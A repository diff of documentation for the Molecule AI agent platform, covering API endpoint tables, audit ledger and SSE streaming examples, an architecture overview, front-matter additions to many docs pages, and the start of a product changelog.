| POST | `/webhooks/:type` | None | Incoming webhook endpoint for social platforms. The `:type` parameter identifies the platform (e.g., `telegram`, `slack`). |
---
## Plugins
Plugin registry and per-workspace plugin management.
### Global Plugin Registry
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/plugins` | None | List all plugins in the registry. Supports `?runtime=` filter to show only compatible plugins. |
| GET | `/plugins/sources` | None | List registered install-source schemes (e.g., `github://`, `local://`). |
### Per-Workspace Plugins
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/plugins` | WorkspaceAuth | List installed plugins for a workspace. |
| POST | `/workspaces/:id/plugins` | WorkspaceAuth | Install a plugin. Body: `{ "source": "github://org/repo" }`. Safeguards: 64 KiB body limit, 5 min fetch timeout, 100 MiB max staged-tree. |
| DELETE | `/workspaces/:id/plugins/:name` | WorkspaceAuth | Uninstall a plugin by name. |
| GET | `/workspaces/:id/plugins/available` | WorkspaceAuth | List plugins available for this workspace (filtered by workspace runtime). |
| GET | `/workspaces/:id/plugins/compatibility` | WorkspaceAuth | Preflight runtime-change check. Query: `?runtime=X`. Returns which currently-installed plugins would be incompatible with the target runtime. |
---
## Auth Tokens
Bearer token management for workspaces.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/tokens` | WorkspaceAuth | List active tokens for a workspace (token values are masked). |
| POST | `/workspaces/:id/tokens` | WorkspaceAuth | Create a new bearer token for the workspace. |
| DELETE | `/workspaces/:id/tokens/:tokenId` | WorkspaceAuth | Revoke a specific token. |
### Test Token (Development Only)
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/admin/workspaces/:id/test-token` | None | Mint a fresh bearer token for E2E scripts. Returns 404 unless `MOLECULE_ENV != production` or `MOLECULE_ENABLE_TEST_TOKENS=1`. |
---
## Teams
Expand and collapse team views in the Canvas hierarchy.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/expand` | WorkspaceAuth | Expand a team workspace to show its children on the canvas. |
| POST | `/workspaces/:id/collapse` | WorkspaceAuth | Collapse a team workspace to hide its children. |
---
## Templates and Bundles
### Templates
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/templates` | AdminAuth | List available workspace templates with their runtime, description, and config schema. |
| POST | `/templates/import` | AdminAuth | Import a workspace template from a `github://` source URL. |
### Org Templates
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/org/templates` | AdminAuth | List available organization templates. |
| POST | `/org/import` | AdminAuth | Import an org template. Applies `resolveInsideRoot` path sanitization. Creates the full workspace hierarchy defined in `org.yaml`. |
### Bundles
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/bundles/export/:id` | AdminAuth | Export a workspace (or workspace tree) as a portable bundle. Includes config, secrets (keys only), memory, schedules, and hierarchy. |
| POST | `/bundles/import` | AdminAuth | Import a previously-exported bundle. Recreates the workspace tree with all associated data. |
---
## Approvals
Human-in-the-loop approval system for agent actions.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| POST | `/workspaces/:id/approvals` | WorkspaceAuth | Create an approval request. Body includes the action description, metadata, and options. |
| GET | `/workspaces/:id/approvals` | WorkspaceAuth | List approval requests for a workspace. |
| POST | `/workspaces/:id/approvals/:id/decide` | WorkspaceAuth | Approve or reject an approval request. Body: `{ "decision": "approve" }` or `{ "decision": "reject" }`. |
| GET | `/approvals/pending` | AdminAuth | List all pending approval requests across all workspaces. |
---
## Canvas
Canvas viewport persistence (cosmetic only).
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/canvas/viewport` | None | Get the saved canvas viewport (zoom, pan position). Open endpoint for bootstrap-friendliness. |
| PUT | `/canvas/viewport` | CanvasOrBearer | Save the canvas viewport. Accepts bearer OR matching `Origin` header. Worst case on forgery: viewport corruption, recovered by page refresh. |
---
## Traces
LLM trace retrieval from Langfuse.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/traces` | WorkspaceAuth | List LLM traces for a workspace from Langfuse. |
---
## Audit Ledger
HMAC-SHA256-chained immutable agent event log for compliance record-keeping (EU AI Act Art. 12 / Art. 13). Each event is cryptographically chained to the previous one — tampering with any record breaks all subsequent HMACs.
<Callout type="warn">
**`AUDIT_LEDGER_SALT` required.** The platform and workspace containers must share the same `AUDIT_LEDGER_SALT` environment variable to compute and verify event HMACs. Set it in both your platform env and workspace container env. If the variable is absent, `chain_valid` returns `null` (not `false`) — no records are lost, verification is simply unavailable.
</Callout>
### Query
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/audit` | WorkspaceAuth | Query the audit ledger for a workspace. Returns events in descending chronological order with inline chain verification. |
**Query parameters:**
| Parameter | Type | Description |
|-----------|------|-------------|
| `agent_id` | string | Filter to a specific agent. |
| `session_id` | string | Filter to a specific session. |
| `from` | RFC 3339 | Start of time range (e.g. `2026-04-01T00:00:00Z`). |
| `to` | RFC 3339 | End of time range. |
| `limit` | int | Max records to return. Capped at **500**. |
| `offset` | int | Pagination offset. |
**Response shape:**
```json
{
"events": [
{
"id": "uuid",
"workspace_id": "uuid",
"agent_id": "my-researcher",
"session_id": "sess_abc123",
"event_type": "tool_call",
"payload": { "tool": "bash", "input": "ls /workspace" },
"hmac": "sha256hex...",
"prev_hmac": "sha256hex...",
"created_at": "2026-04-17T12:00:00Z"
}
],
"chain_valid": true
}
```
`chain_valid` values:
- `true` — all HMACs verified; ledger is intact.
- `false` — at least one HMAC mismatch; possible tampering.
- `null` — `AUDIT_LEDGER_SALT` is absent from the platform env; verification skipped.
### Workspace-side: recording events
In your workspace template, wire `LedgerHooks` into the agent pipeline:
```python
from molecule_audit.hooks import LedgerHooks
hooks = LedgerHooks(agent_id="my-researcher", session_id=session_id)
async with hooks:
# hooks.on_task_start / on_llm_call / on_tool_call / on_task_end
# fire automatically at each pipeline stage
result = await agent.run(task)
```
`LedgerHooks` is exception-safe — a failed ledger write never aborts the agent task.
### CLI chain verification
```bash
# Verify the full chain for an agent; exit 0 = intact
python -m molecule_audit.verify --agent-id my-researcher
# Custom DB URL
python -m molecule_audit.verify --agent-id my-researcher --db postgresql://user:pass@host/db
```
Exit codes: `0` = chain valid · `1` = broken chain · `2` = `AUDIT_LEDGER_SALT` missing · `3` = DB error.
---
## Events
Append-only event log for structure changes.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/events` | AdminAuth | List all structure events across all workspaces. |
| GET | `/events/:workspaceId` | AdminAuth | List structure events for a specific workspace. |
---
## Terminal
WebSocket-based terminal access to workspace containers.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| WS | `/workspaces/:id/terminal` | WorkspaceAuth | Open a WebSocket terminal session to the workspace container. Provides interactive shell access. |
---
## WebSocket
Real-time event streaming for Canvas clients.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| WS | `/ws` | None | Connect to the WebSocket hub. Receives all structure events (`WORKSPACE_ONLINE`, `WORKSPACE_OFFLINE`, `HEARTBEAT`, `CONFIG_UPDATED`, `A2A_RESPONSE`, `AGENT_MESSAGE`, etc.). Canvas clients connect here for real-time updates. |
---
## Server-Sent Events (AG-UI)
Per-workspace SSE stream compatible with the [AG-UI protocol](https://github.com/ag-ui-protocol/ag-ui). Use this endpoint to consume structured agent events from a web client or external tool without a WebSocket library.
| Method | Path | Auth | Description |
|--------|------|------|-------------|
| GET | `/workspaces/:id/events/stream` | WorkspaceAuth | Open an SSE stream for the workspace. Returns `Content-Type: text/event-stream`. Sends an initial `: ping` comment on connect, then delivers every event emitted by the workspace in AG-UI envelope format. Events from other workspaces are filtered out. Returns `404` if the workspace does not exist. |
### Event envelope format
Each event is delivered as an SSE `data:` line containing a JSON object:
```json
{
"type": "AGENT_MESSAGE",
"timestamp": 1713398400000,
"data": { ... }
}
```
- **`type`** — event type string (e.g. `AGENT_MESSAGE`, `A2A_RESPONSE`, `TASK_UPDATED`)
- **`timestamp`** — Unix milliseconds at time of broadcast
- **`data`** — event-specific payload (same payload as the WebSocket hub delivers)
### Event types streamed
All event types emitted by `RecordAndBroadcast` **and** `BroadcastOnly` reach the SSE stream. The `BroadcastOnly` path is important: events like `AGENT_MESSAGE`, `A2A_RESPONSE`, and `TASK_UPDATED` skip Redis and would be invisible to a Redis-only subscriber — the in-process SSE layer catches them.
### Example: connect with `curl`
```bash
curl -N \
-H "Authorization: Bearer <workspace-token>" \
http://localhost:8080/workspaces/<id>/events/stream
```
```
: ping
data: {"type":"AGENT_MESSAGE","timestamp":1713398401234,"data":{"text":"Starting task..."}}
data: {"type":"TASK_UPDATED","timestamp":1713398405678,"data":{"status":"running"}}
```
### Example: connect from JavaScript
```js
const es = new EventSource(
`/workspaces/${workspaceId}/events/stream`,
{ headers: { Authorization: `Bearer ${token}` } }
);
es.onmessage = (e) => {
const event = JSON.parse(e.data);
console.log(event.type, event.data);
};
```
<Callout type="info">
The SSE endpoint uses WorkspaceAuth — the bearer token must be bound to the `:id` in the path. A token for workspace A cannot open a stream for workspace B.
</Callout>
---
## Error Responses
All endpoints return standard HTTP status codes:
| Status | Meaning |
|--------|---------|
| 200 | Success |
| 201 | Created |
| 400 | Bad request (malformed body, missing required fields) |
| 401 | Unauthorized (missing or invalid bearer token) |
| 403 | Forbidden (valid token but insufficient access) |
| 404 | Not found (workspace, schedule, channel, etc. does not exist) |
| 409 | Conflict (idempotency key collision on delegation) |
| 429 | Rate limited (exceeds `RATE_LIMIT` requests/min) |
| 500 | Internal server error |
Error response body format:
```json
{
"error": "human-readable error message"
}
```
---
## Rate Limiting
All endpoints are subject to a global rate limit of `RATE_LIMIT` requests per minute (default: 600). When exceeded, the platform returns `429 Too Many Requests` with a `Retry-After` header.
---
## CORS
The platform sets CORS headers based on the `CORS_ORIGINS` environment variable (comma-separated list, default: `http://localhost:3000,http://localhost:3001`). Preflight (`OPTIONS`) requests are handled automatically by the Gin CORS middleware.

View File

@ -0,0 +1,361 @@
---
title: Architecture
description: System architecture, components, infrastructure, and communication model for the Molecule AI platform.
---
# Architecture
Molecule AI is a platform for orchestrating AI agent workspaces that form an organizational hierarchy. Workspaces register with a central platform, communicate via A2A (Agent-to-Agent) protocol, and are visualized on a drag-and-drop canvas.
## System Overview
```
Canvas (Next.js :3000) <--WebSocket--> Platform (Go :8080) <--HTTP--> Postgres + Redis
|
Workspace A <----A2A----> Workspace B
(Python agents)
| register/heartbeat |
+------ Platform ----+
```
The Canvas provides the visual interface, the Platform acts as the control plane, and Workspaces are isolated containers running AI agent runtimes. All inter-agent communication is mediated by the Platform via the A2A proxy, which enforces hierarchical access control.
---
## Four Main Components
### Canvas
**Stack:** Next.js 15 + React Flow (@xyflow/react v12) + Zustand + Tailwind CSS
The Canvas is the browser-based visual workspace graph. It provides:
- **Drag-and-drop layout** with persistent node positions (saved via `PATCH /workspaces/:id`)
- **Team nesting** using recursive `TeamMemberChip` components (up to 3 levels deep)
- **Real-time status** via WebSocket connection to the Platform
- **Chat interface** with two sub-tabs: "My Chat" (user-to-agent) and "Agent Comms" (agent-to-agent A2A traffic)
- **Config editor** with "Save & Restart" and "Save" (deferred restart) modes
- **Secrets management** with auto-restart on POST/DELETE
**State management:**
| Concern | Mechanism |
|---------|-----------|
| Initial load | HTTP fetch `GET /workspaces` into Zustand |
| Real-time updates | WebSocket events via `applyEvent()` |
| Position persistence | `onNodeDragStop` sends `PATCH /workspaces/:id` with `{x, y}` |
| Node nesting | `nestNode` sets `hidden: !!targetId`; children render inside parent |
**Environment variables:**
| Variable | Default | Purpose |
|----------|---------|---------|
| `NEXT_PUBLIC_PLATFORM_URL` | `http://localhost:8080` | Platform API base URL |
| `NEXT_PUBLIC_WS_URL` | `ws://localhost:8080/ws` | WebSocket endpoint |
### Platform
**Stack:** Go / Gin
The Platform is the central control plane responsible for:
- **Workspace CRUD** -- create, read, update, delete workspaces
- **Registry** -- workspace registration, heartbeat tracking, agent card management
- **Discovery** -- peer lookup, access control checks
- **WebSocket hub** -- real-time event broadcasting to Canvas clients
- **Liveness monitoring** -- three-layer container health detection
- **A2A proxy** -- routes inter-agent messages with hierarchical access control
- **Docker provisioner** -- container lifecycle management with tier-based resource limits
- **Scheduler** -- cron-based scheduled tasks per workspace
- **Channel adapters** -- social integrations (Telegram, Slack, etc.)
**Key environment variables:**
| Variable | Default | Purpose |
|----------|---------|---------|
| `DATABASE_URL` | (required) | Postgres connection string |
| `REDIS_URL` | (required) | Redis connection string |
| `PORT` | `8080` | Server listen port |
| `PLATFORM_URL` | `http://host.docker.internal:PORT` | URL passed to agent containers |
| `SECRETS_ENCRYPTION_KEY` | (optional) | AES-256 key, 32 bytes |
| `CORS_ORIGINS` | `http://localhost:3000,http://localhost:3001` | Allowed CORS origins |
| `RATE_LIMIT` | `600` | Requests per minute |
| `MOLECULE_ENV` | (optional) | Set `production` to hide test endpoints |
| `MOLECULE_ORG_ID` | (optional) | SaaS tenant org gating |
| `WORKSPACE_DIR` | (optional) | Global fallback host path for `/workspace` bind-mount |
| `AWARENESS_URL` | (optional) | Injected into workspace containers for cross-session memory |
| `ACTIVITY_RETENTION_DAYS` | `7` | How long activity logs are kept |
| `ACTIVITY_CLEANUP_INTERVAL_HOURS` | `6` | Cleanup sweep interval |
**Workspace tier resource limits:**
| Tier | Env (Memory) | Env (CPU) | Defaults |
|------|-------------|-----------|----------|
| Standard (Tier 2) | `TIER2_MEMORY_MB` | `TIER2_CPU_SHARES` | 512 MB / 1 CPU |
| Privileged (Tier 3) | `TIER3_MEMORY_MB` | `TIER3_CPU_SHARES` | 2048 MB / 2 CPU |
| Full-host (Tier 4) | `TIER4_MEMORY_MB` | `TIER4_CPU_SHARES` | 4096 MB / 4 CPU |
### Workspace Runtime
**Published as:** [`molecule-ai-workspace-runtime`](https://pypi.org/project/molecule-ai-workspace-runtime/) on PyPI
The shared runtime provides the base agent infrastructure: A2A server, heartbeat loop, config loading, platform auth, plugin system, and built-in tools. Each AI framework adapter lives in its own standalone repository.
| Runtime | Standalone Repo | Key Dependencies |
|---------|-----------------|------------------|
| LangGraph | `molecule-ai-workspace-template-langgraph` | langchain-anthropic, langgraph |
| Claude Code | `molecule-ai-workspace-template-claude-code` | claude-agent-sdk, @anthropic-ai/claude-code |
| OpenClaw | `molecule-ai-workspace-template-openclaw` | openclaw (npm) |
| CrewAI | `molecule-ai-workspace-template-crewai` | crewai |
| AutoGen | `molecule-ai-workspace-template-autogen` | autogen |
| DeepAgents | `molecule-ai-workspace-template-deepagents` | deepagents |
| Hermes | `molecule-ai-workspace-template-hermes` | openai, anthropic, google-genai |
| Gemini CLI | `molecule-ai-workspace-template-gemini-cli` | @google/gemini-cli (npm) |
| [Google ADK](/docs/google-adk) | `molecule-ai-workspace-template-google-adk` | google-adk>=1.0.0 |
Each adapter repo has its own `Dockerfile` that installs `molecule-ai-workspace-runtime` from PyPI plus adapter-specific dependencies. Templates are cloned at Docker build time into the platform image via `manifest.json`.
### Framework Adapters (workspace-template)
Some workspace templates embed framework-specific adapters that extend `molecule-ai-workspace-runtime` with framework-level security controls. The **smolagents adapter** (`workspace-template/adapters/smolagents/`) ships two such controls:
**Environment sanitization** (`make_safe_env`) — child processes spawned by the smolagents adapter inherit a filtered copy of the host environment. The following are stripped before the subprocess starts:
- Any key listed in `SMOLAGENTS_ENV_DENYLIST` (comma-separated; set by the operator)
- Any key whose name ends in `_API_KEY` or `_TOKEN`
Set `SMOLAGENTS_ENV_DENYLIST=VAR1,VAR2` in the workspace's secrets to extend the denylist.
**Safe message delivery** (`safe_send_message`) — outbound smolagents messages are:
1. Prefixed with `[smolagents]` so the source is always attributable in logs and Canvas activity
2. Truncated at 2 000 characters to prevent oversized payloads
3. HTML-entity-escaped to block social-engineering injections embedded in agent output
These controls complement the platform-level secret redaction described in the [API Reference](/docs/api-reference#agent-memories-hma-scoped).
### molecli
**Stack:** Go / Bubbletea + Lipgloss
A terminal UI dashboard for real-time workspace monitoring, event log streaming, health overview, and delete/filter operations. Reads `MOLECLI_URL` (default `http://localhost:8080`) to locate the platform. Now published as a standalone repo at `github.com/Molecule-AI/molecule-cli`.
---
## Infrastructure Services
All services run via `docker-compose.infra.yml`, attached to the shared `molecule-monorepo-net` network. Start them with:
```bash
./infra/scripts/setup.sh # Start Postgres, Redis, Langfuse, Temporal; run migrations
```
### Postgres (port 5432)
Primary datastore for workspaces, events, activity logs, secrets, schedules, channels, and more. Also backs Langfuse and Temporal via separate databases.
Key tables:
| Table | Purpose |
|-------|---------|
| `workspaces` | Core entity -- status, runtime, agent_card, heartbeat, current_task |
| `canvas_layouts` | Persisted x/y positions |
| `structure_events` | Append-only event log |
| `activity_logs` | A2A communications, task updates, agent logs, errors |
| `workspace_schedules` | Cron tasks with expression, timezone, prompt, run history |
| `workspace_channels` | Social channel integrations with JSONB config |
| `workspace_secrets` / `global_secrets` | Encrypted secrets storage |
| `workspace_auth_tokens` | Bearer tokens (auto-revoked on workspace delete) |
| `agent_memories` | HMA-scoped agent memory |
| `approvals` | Human-in-the-loop approval requests |
**Migration runner:** On startup, the platform globs `*.sql` in the migrations directory, filters out `.down.sql` files, sorts alphabetically, and executes each. All `.up.sql` files must be idempotent (`CREATE TABLE IF NOT EXISTS`, `ALTER TABLE ... IF NOT EXISTS`).
**JSONB gotcha:** When inserting Go `[]byte` (from `json.Marshal`) into Postgres JSONB columns, you must convert to `string()` first and use `::jsonb` cast in SQL. The `lib/pq` driver treats `[]byte` as `bytea`, not JSONB.
### Redis (port 6379)
Used for pub/sub event broadcasting and heartbeat TTL tracking. Workspace heartbeat keys expire after 60 seconds -- expiry triggers the liveness monitor.
### Langfuse (port 3001)
LLM trace viewer backed by ClickHouse. Provides observability into agent LLM calls, token usage, and latency.
### Temporal (port 7233 gRPC, port 8233 Web UI)
Durable workflow engine for `workspace-template/builtin_tools/temporal_workflow.py`. Dev-only posture: the auto-setup image runs with no auth on `0.0.0.0:7233`. Production deployments must gate access via mTLS or an API key / reverse proxy.
---
## Communication Model
### WebSocket Events Flow
```
1. Action occurs (register, heartbeat, config change, etc.)
2. broadcaster.RecordAndBroadcast()
-> inserts into structure_events table
-> publishes to Redis pub/sub
3. Redis subscriber relays to WebSocket hub
4. Hub broadcasts to:
- Canvas clients (all events)
- Workspace clients (filtered by CanCommunicate)
```
### A2A Proxy
The A2A proxy (`POST /workspaces/:id/a2a`) routes agent-to-agent messages. The caller identifies itself via the `X-Workspace-ID` header and authenticates with `Authorization: Bearer <token>`.
### Access Control Rules
Determined by `CanCommunicate(callerID, targetID)` in `registry/access.go`:
| Relationship | Allowed |
|-------------|---------|
| Same workspace (self-call) | Yes |
| Siblings (same `parent_id`) | Yes |
| Root-level siblings (both `parent_id` IS NULL) | Yes |
| Parent to child / child to parent | Yes |
| System callers (`webhook:*`, `system:*`, `test:*`) | Yes (bypass) |
| Canvas requests (no `X-Workspace-ID`) | Yes (bypass) |
| Everything else | **Denied** |
### Import Cycle Prevention
The platform uses function injection to avoid Go import cycles between `ws`, `registry`, and `events` packages:
- `ws.NewHub(canCommunicate AccessChecker)` -- Hub accepts `registry.CanCommunicate` as a function
- `registry.StartLivenessMonitor(ctx, onOffline OfflineHandler)` -- Liveness accepts broadcaster callback
- `registry.StartHealthSweep(ctx, checker ContainerChecker, interval, onOffline)` -- Health sweep accepts Docker checker interface
- Wiring happens in `platform/cmd/server/main.go` -- init order: `wh -> onWorkspaceOffline -> liveness/healthSweep -> router`
---
## Container Health Detection
Three independent layers detect dead containers (e.g., Docker Desktop crash):
### Layer 1: Passive (Redis TTL)
Each workspace sends heartbeats that set a Redis key with a 60-second TTL. When the key expires, the liveness monitor detects the workspace as offline and triggers an auto-restart.
### Layer 2: Proactive (Health Sweep)
`registry.StartHealthSweep` polls the Docker API every 15 seconds. Catches dead containers faster than waiting for Redis TTL expiry.
### Layer 3: Reactive (A2A Proxy)
When the A2A proxy encounters a connection error to a workspace, it immediately checks `provisioner.IsRunning()`. If the container is dead, it marks the workspace offline and triggers a restart.
All three layers call `onWorkspaceOffline`, which broadcasts `WORKSPACE_OFFLINE` and initiates `wh.RestartByID()`. Redis cleanup uses the shared `db.ClearWorkspaceKeys()` function.
---
## Workspace Lifecycle
```
provisioning --> online (on register)
^ |
| degraded (error_rate > 0.5)
| |
| online (recovered)
| |
| offline (Redis TTL expired / health sweep)
| |
+--- auto-restart ---+
|
removed (deleted)
Any state --> paused (user pauses) --> provisioning (user resumes)
```
Paused workspaces skip health sweep, liveness monitor, and auto-restart.
**Restart context:** After any restart and successful re-registration, the platform sends a synthetic A2A `message/send` with `metadata.kind=restart_context` containing the restart timestamp, previous session info, and available env-var keys (keys only, never values). The sender uses the `system:restart-context` caller prefix to bypass `CanCommunicate`. If the workspace does not re-register within 30 seconds, the message is dropped.
**Initial prompt:** Agents can auto-execute a prompt on startup before any user interaction. Configure via `initial_prompt` (inline string) or `initial_prompt_file` (path relative to config dir) in `config.yaml`. A `.initial_prompt_done` marker file prevents re-execution on restart.
**Idle loop:** When `idle_prompt` is non-empty in `config.yaml`, the workspace self-sends it every `idle_interval_seconds` (default 600) while `heartbeat.active_tasks == 0`. The idle check is local (no LLM call) and the prompt only fires when the agent is genuinely idle.
---
## Deployment Modes
### Self-Hosted
Run the full stack on your own infrastructure using Docker Compose:
```bash
# Infrastructure only (Postgres, Redis, Langfuse, Temporal)
docker compose -f docker-compose.infra.yml up -d
# Full stack
docker compose up
```
### SaaS
Hosted at `moleculesai.app` with per-tenant isolation. Each tenant gets a dedicated Fly Machine running the tenant image. The `MOLECULE_ORG_ID` env var gates API access -- every non-allowlisted request must carry a matching `X-Molecule-Org-Id` header or gets a 404. When unset, the guard is a passthrough so self-hosted and dev environments are unaffected.
### Tenant Image
`platform/Dockerfile.tenant` bundles the Go platform + Canvas frontend + templates into a single container image, published to `ghcr.io/molecule-ai/platform:latest` and `:sha-<short>`.
---
## Subdomain Architecture
| Subdomain | Service | Purpose |
|-----------|---------|---------|
| `moleculesai.app` | Landing page | Marketing site |
| `app.moleculesai.app` | SaaS dashboard | Tenant management UI |
| `api.moleculesai.app` | Control plane API | Platform REST + WebSocket |
| `doc.moleculesai.app` | Documentation | This documentation site |
| `status.moleculesai.app` | Status page | Uptime and incident tracking |
| `*.moleculesai.app` | Tenant instances | Per-org isolated platform instances |
---
## Plugin System
Plugins extend workspace capabilities. Two categories exist:
**Shared plugins** (auto-loaded by every workspace):
- **molecule-dev** -- codebase conventions + review-loop skill
- **superpowers** -- verification, TDD, systematic debugging, writing plans
- **ecc** -- general Claude Code guardrails
- **browser-automation** -- Puppeteer/CDP web scraping and live canvas screenshots
**Modular guardrails** (opt-in per workspace):
- **Hook plugins** (ambient enforcement): `molecule-careful-bash`, `molecule-freeze-scope`, `molecule-audit-trail`, `molecule-session-context`, `molecule-prompt-watchdog`
- **Skill plugins** (on-demand): `molecule-skill-code-review`, `molecule-skill-cross-vendor-review`, `molecule-skill-llm-judge`, `molecule-skill-update-docs`, `molecule-skill-cron-learnings`
- **Workflow plugins** (slash commands): `molecule-workflow-triage`, `molecule-workflow-retro`
**Org-template plugin resolution:** Per-workspace `plugins:` lists in org template `org.yaml` role overrides UNION with `defaults.plugins` (deduplicated, defaults first). To opt a specific default out for a given role, prefix the plugin name with `!` or `-` (e.g. `!browser-automation`).
Plugin install safeguards:
| Parameter | Default | Purpose |
|-----------|---------|---------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | 65536 (64 KiB) | Max request body size |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | 5m | Whole fetch+copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | 104857600 (100 MiB) | Max staged-tree size |
---
## CI Pipeline
GitHub Actions runs on push to main and on pull requests:
| Job | What it does |
|-----|-------------|
| `platform-build` | Go build, vet, `go test -race` with 25% coverage threshold |
| `canvas-build` | npm build, vitest run (tests must exist and pass) |
| `python-lint` | pytest with coverage for workspace-template |
| `e2e-api` | Spins up Postgres + Redis, runs 62 API tests against locally-built binary |
| `shellcheck` | Lints all E2E shell scripts |
| `publish-platform-image` | Builds and pushes to `ghcr.io/molecule-ai/platform` (main only) |
Standalone repos (plugins + templates) use reusable workflows from `Molecule-AI/molecule-ci` for schema validation, secrets scanning, and Docker build smoke tests.

View File

@ -1,3 +1,6 @@
---
title: "System Architecture"
---
# System Architecture
## Overview

View File

@ -1,3 +1,6 @@
---
title: "Canary release pipeline"
---
# Canary release pipeline
How a workspace-server code change reaches the prod tenant fleet — and how to stop it if something's wrong.

View File

@ -1,3 +1,6 @@
---
title: "Database Schema"
---
# Database Schema
## Postgres Tables

View File

@ -1,3 +1,6 @@
---
title: "Event Log"
---
# Event Log
Every structural change appends an immutable row to `structure_events`. The table is **append-only** — rows are never updated or deleted. This is the event sourcing pattern.

View File

@ -1,3 +1,6 @@
---
title: "Memory Architecture (HMA)"
---
# Memory Architecture (HMA)
Molecule AI's memory model is built around one principle:

View File

@ -1,3 +1,6 @@
---
title: "Molecule AI — Comprehensive Technical Documentation"
---
# Molecule AI — Comprehensive Technical Documentation
> Definitive technical reference for the Molecule AI Agent Team platform.

View File

@ -1,3 +1,6 @@
---
title: "Architecture Overview"
---
# Architecture Overview
Molecule AI is a platform for orchestrating AI agent workspaces that form an organizational hierarchy. Workspaces register with a central platform, communicate via A2A protocol, and are visualized on a drag-and-drop canvas.

View File

@ -1,3 +1,6 @@
---
title: "Partner API Keys — Programmatic Org Management"
---
# Partner API Keys — Programmatic Org Management
> **Status:** Planned

View File

@ -1,3 +1,6 @@
---
title: "Provisioner"
---
# Provisioner
The provisioner is the platform component that deploys workspace containers and VMs. It is triggered when a workspace is created, imported from a bundle, or expanded into a team.

View File

@ -1,3 +1,6 @@
---
title: "SaaS prod migration — 2026-04-19"
---
# SaaS prod migration — 2026-04-19
Promoted staging → main on both `Molecule-AI/molecule-controlplane` and `Molecule-AI/molecule-core`. This note captures the prod cutover deltas so ops can cross-check against the running system.

View File

@ -1,3 +1,6 @@
---
title: "Staging Environment Design"
---
# Staging Environment Design
> **Status:** Planned — gates all future infra changes (Tunnel migration,

View File

@ -1,3 +1,6 @@
---
title: "Technology Choices"
---
# Technology Choices
This document explains why each technology was chosen for Molecule AI.

View File

@ -1,3 +1,6 @@
---
title: "Tenant Image Upgrade Strategies"
---
# Tenant Image Upgrade Strategies
> **Status:** Option B (sidecar auto-updater) implemented. Options A and C

View File

@ -1,3 +1,6 @@
---
title: "Wildcard DNS + Cloudflare Worker Proxy"
---
# Wildcard DNS + Cloudflare Worker Proxy
> **Status:** Planned — replaces per-tenant DNS record creation.

View File

@ -1,3 +1,6 @@
---
title: "Workspace Tiers"
---
# Workspace Tiers
Four tiers control the security boundary for each workspace. Higher tiers get more system access but less isolation.

217
content/docs/changelog.mdx Normal file
View File

@ -0,0 +1,217 @@
---
title: Changelog
description: Customer-facing release notes for Molecule AI — updated daily.
---
All notable changes to the Molecule AI platform are documented here.
Entries are published daily at 23:50 UTC.
---
## 2026-04-17
A high-velocity day: 80+ PRs merged across platform, canvas, runtimes, security, and channels.
### ✨ New features
#### opencode Integration — MCP bridge for AI coding agents
Connect [opencode](https://opencode.ai) to any Molecule AI workspace over a
standard `Authorization: Bearer` remote MCP connection. opencode gains the full
A2A tool surface (`delegate_task`, `list_peers`, `recall_memory`, and more)
via two transports: Streamable HTTP (`POST /workspaces/:id/mcp`) and SSE
(backwards-compat `GET /workspaces/:id/mcp/stream`). Rate-limited to 120 req/min
per token. See the [opencode Integration guide](/docs/opencode).
(#840, #842)
#### Slack — per-agent identity with Bot Token mode
The Slack channel adapter now supports dual-mode outbound: **Bot Token** (new,
recommended) and Incoming Webhook (legacy, unchanged). With a `bot_token` each
workspace posts under its own display name and icon via `chat:write.customize`.
Markdown is automatically converted to Slack `mrkdwn` format.
See [Channels](/docs/channels).
(#844, #851)
#### AG-UI compatible SSE endpoint
New `GET /workspaces/:id/events` endpoint streams agent events as AG-UI
compatible Server-Sent Events. Enables AG-UI frontend integrations to subscribe
to live workspace activity without polling.
(#601)
#### A2A topology overlay on the canvas
The canvas now renders a live A2A topology overlay — every workspace as a node,
every in-flight delegation as an animated directed edge. Zoom to team, click any
edge to inspect the task payload.
(#751)
#### Audit trail visualisation panel
A new audit trail panel in the canvas surfaces the HMAC-SHA256 immutable event
log per workspace — every task received, LLM call, and completion in
chronological order with chain-of-custody verification.
(#651, #759)
#### Workspace hibernation — auto-pause idle workspaces
Workspaces that receive no tasks for `HIBERNATION_IDLE_MINUTES` (default: 30)
are automatically hibernated (containers paused, resources freed). They
auto-wake on the next inbound task with full state restored. Manage via
`POST /workspaces/:id/hibernate` and `POST /workspaces/:id/wake`.
See [API Reference](/docs/api-reference).
(#724)
#### Temporal workflow checkpoints — step-level persistence
Workspace templates now persist intermediate workflow steps to the database.
On container restart (crash, deploy, hibernate/wake) the workspace resumes from
the last completed step rather than restarting the whole task. Step endpoints
documented in the [API Reference](/docs/api-reference).
(#797, #803)
#### Semantic memory search
Agent memory is now vector-indexed via pgvector. `recall_memory` accepts an
optional `?q=` parameter for semantic (embedding) search in addition to exact
keyword match. Nearest-neighbour results are ranked by cosine similarity and
colour-coded in the canvas Memory Inspector.
(#784, #787)
#### Memory Inspector panel
A new canvas panel lets you browse, search, and inspect all `LOCAL` and `TEAM`
memory keys for any workspace — live, without leaving the canvas.
(#738)
#### Hermes — stacked system messages
The Hermes runtime now accepts a `system_blocks` list: each block (persona,
tools, reasoning policy) is merged in order rather than overwriting the previous
system prompt. Enables persona stacking for complex multi-role workflows.
See [API Reference](/docs/api-reference) → Runtimes section.
(#655, #798)
#### Hermes — native `tools` parameter
Hermes passes tools to the model via the native `tools=[]` API parameter instead
